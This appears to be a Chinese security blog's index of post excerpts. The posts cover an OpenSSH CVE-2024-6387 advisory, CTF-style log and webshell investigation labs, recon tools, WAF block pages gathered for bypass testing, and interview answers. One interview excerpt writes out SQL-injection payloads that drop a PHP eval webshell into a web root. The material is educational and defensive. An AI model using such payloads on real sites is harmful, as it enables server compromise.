OpenSSH 远程代码执行漏洞(CVE-2024-6387)
OpenSSH 远程代码执行漏洞(CVE-2024-6387)漏洞详情 OpenSSH 是使用 SSH 协议进行远程登录的首要连接工具。 它加密所有流量以消除窃听、连接劫持、 和其他攻击。 此外,OpenSSH 还提供了一整套安全隧道功能, 多种身份验证方法和复杂的配置选项。 据官方描述,在 OpenSSH 的服务器 (sshd) 中发现了一个信号处理程序争用条件,其中客户端不会在 LoginGraceTime 秒内进行身份验证(默认为 120 秒,在旧 OpenSSH 版本中为 600 秒),然后异步调用 sshd 的 SIGALRM 处理程序。但是,此信号处理程序调用各种非异步信号安全的函数,例如 syslog()。 风险等级 高风险 影响版本 OpenSSH < 4.4p1(未更新历史漏洞 CVE-2006-5051、CVE-2008-4109 的补丁) 8.5p1 <= OpenSSH < 9.8p1 CentOS 9(暂未发布补丁) Ubuntu 22.04、24.04 Debian 12 修复建议 1.官方已发布漏洞补丁及修复版本,请评估业...
玄机靶场--2.日志分析-apache日志分析
玄机靶场–2.日志分析-apache日志分析启动环境 IP地址 SSH连接后查询默认日志名称access.log 然后用命令查看发现access.log为空,但是access.log.1有数据 1、提交当天访问次数最多的IP,即黑客IP:1cat /var/log/apache2/access.log.1 | awk '{print $1}' | sort | uniq -c | sort -nr | head 命令详解 12345print $1 为打印第一个字段 $0为整行sort 排序uniq 显示或忽略重复的行。 -c在每行开头增加重复次数。sort -nr:按照出现次数进行降序排序。head 显示文件的开头部分。 2、黑客使用的浏览器指纹是什么,提交指纹的md5:1grep '192.168.200.2' /var/log/apache2/access.log.1 | awk -F'"' '{print $6}' 命令详解...
信息打点
信息打点CMS指纹识别 云悉 https://www.yunsee.cn/ TideFinger https://github.com/TideSec/TideFinger Glass https://github.com/s7ckTeam/Glass Chunsou(春蒐) https://github.com/Funsiooo/chunsou EHole(棱洞) https://github.com/EdgeSecurityTeam/EHole 源码泄露 git泄露 https://github.com/lijiejie/GitHack svn泄露 https://github.com/callmefeifei/SvnHack DS_Store泄露 https://github.com/lijiejie/ds_store_exp php composer.json泄露 WEB-INF/web.xml 泄露 网站备份压缩文件 常见端口和入侵思路1.文件共享服务 端口号 端口说明 利用方向 21/22/69 FTP/TFTP...
常见WAF拦截页整理
常见WAF拦截页整理2019年底在@madcoding老哥博客中看到“waf的识别与绕过”一文中搜集了不少WAF拦截页面,正好我平时也有搜集WAF拦截页面习惯,所以就结合他的一起整理了这篇文章,也便于自己在日后遇到WAF时好查询,然后再对其进行针对性的绕过测试!!! 如今WAF种类繁多,我们搜集整理的可能也不是那么齐全和准确,还望得到各位师傅的补充和修正!!! (1) D盾 (2) 云锁 (3) UPUPW (4) BT-宝塔 (5) 网防G01 (6) 护卫神 (7) 网站安全狗 (8) 智创防火墙 (9) 360主机卫士/360webscan (10) 西数WTS-WAF (11) Naxsi WAF (12) 腾讯云 (13) 腾讯宙斯盾 (14) 百度云 (15) 华为云 (16) 网宿云 (17) 创宇盾 (18) 玄武盾 (19) 阿里云盾 (20) 360网站卫士 (21) 奇安信网站卫士 (22) 安域云WAF (23) 铱讯WAF (24) 长亭SafeLine 新版雷池waf(社区版) (25) 安恒明御WAF (26) F5 BIG-IP ...
斗象科技2024HW高危漏洞合集
斗象科技2024HW高危漏洞合集v1.0下载地址 v2.0下载地址 v3.0下载地址 v1.0预览 v2.0预览 v3.0预览
玄机靶场--1.webshell查杀
玄机靶场–1.webshell查杀我们先启动环境 开启环境后会有IP地址 账号密码就在概述里面 使用SSH链接靶机,然后查看开启的端口 端口显示有80,22,3306,有web服务 然后查找目录,进入根目录用 1find -name index.html 查找到在/var/www/html目录下 现在本地靶机进行河马webshell扫描 然后发现扫描不到,只有一个一句话木马,无法进行外网访问,我们另起他法,将目录打包到本地 然后在在线扫描再试试看(其实我本地杀软已经报毒了,但是还是在河马在线扫描进行了一次扫描)地址链接 一共扫描出5个结果 1、黑客webshell里面的flag一个疑似PHP命令执行webshell,一个是PHP命令执行webshell 我们先打开这个比较确定的 里面有一串注释就是webshell里面的flag了 2、黑客使用的什么工具的shell github地址的md5然后上面gz.php代码一眼望去—哥斯拉(具体请看别的大佬的webshell管理工具分析分析) 1234567891011121314151...
亚信安全2024攻防演练高危漏洞合集
亚信安全2024攻防演练高危漏洞合集下载地址 预览
记一次国护面试题
记一次国护面试题先看简历,然后根据你的项目经验去先问一些针对性问题,这些就自由回答了。 问:绕过白名单的方式 答: 100截断 问:00截断应该写在哪里 答: 1放在文件上传的路径后面 问:你一般如何用sql写入webshell呢 答: 12345678910常见的仅适用于联合注入。union 跟 select into outfileunion select 1,"<?php @eval($_POST['xxxx']);?>",3 into outfile 'D:\\www\\WWWroot\\hack.php'或者写入到表,然后在导出为文件写入到日志里盲注或者报错常用分隔符注入into outfile 'D:\\www\\WWWroot\\hack.php' lines terminated by '<?php @eval($_POST['xxxx']);?>' 还有一些这些大佬blog写的更全可以学习 SQL注入写入websh...
Scoop使用体验
Scoop使用体验Scoop的项目地址:https://github.com/ScoopInstaller/Scoop 前言Scoop 从命令行以最小的安装您熟悉和喜爱的程序: 消除权限弹出窗口 隐藏 GUI 向导式安装程序 防止安装大量程序造成 PATH 污染 避免因安装和卸载程序而产生的意外副作用 自动查找并安装依赖项 自行执行所有额外的设置步骤以获得工作程序 这是官网的机翻,以我自己来说,这是一个可以节省大量时间的包管理工具,不需要在配环境上面大费时间(配环境也是一个学习的过程,不建议新手一上来就使用此工具) 安装 Powershell>=5.1 Windows的用户名为英文 且可以对GitHub有快速、正常访问和下载资源的速度 先在Powershell执行 1Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser 然后有两种安装方式具体可以看文档,我们不进行详解只进行一个两种方式的测试安装 第一种 12irm get.scoop.sh | iex//默认安装在C:\U...
越南海莲花APT针对中国大陆的邮件钓鱼技战术手法总结
Part1 前言**大家好,我是ABC_123,公众号正式更名为”希潭实验室”,敬请关注。**去年ABC_123跟朋友一起吃饭,听一个朋友兴奋地说道“我们抓到了一个海莲花!”,于是便引起了我对海莲花APT组织的兴趣。本期就分析一下这个长期对我国进行网络攻击的APT组织“海莲花”,又名APT32、OceanLotus或APT-C-00,该组织普遍认为由越南政府支持,至少从2012年4月份开始,长期对中国及其它国家的政府机构、科研机构、大型国企、能源行业、金融行业和重要私企等进行网络攻击,窃取机密情报或技术资料。 注:对于本篇文章,ABC_123参考了大量由微步威胁情报中心、360安全公司、奇安信安全公司、腾讯御见威胁情报中心、安天公司、看雪论坛等公开发布的各种文章及分析报告,在此谢过。从2020年开始,海莲花开始逐步减少常用的鱼叉式钓鱼入侵,转向漏洞挖掘、水坑攻击甚至是攻击上游供应链,这也是为什么这两年出现在公众视野的海莲花样本大幅度减少的原因。 海莲花APT组织常用的攻击手段就是“鱼叉攻击”及“水坑攻击”,本篇文章着重介绍一下海莲花的鱼叉攻击的钓鱼邮件手法,使大家对于海莲花APT...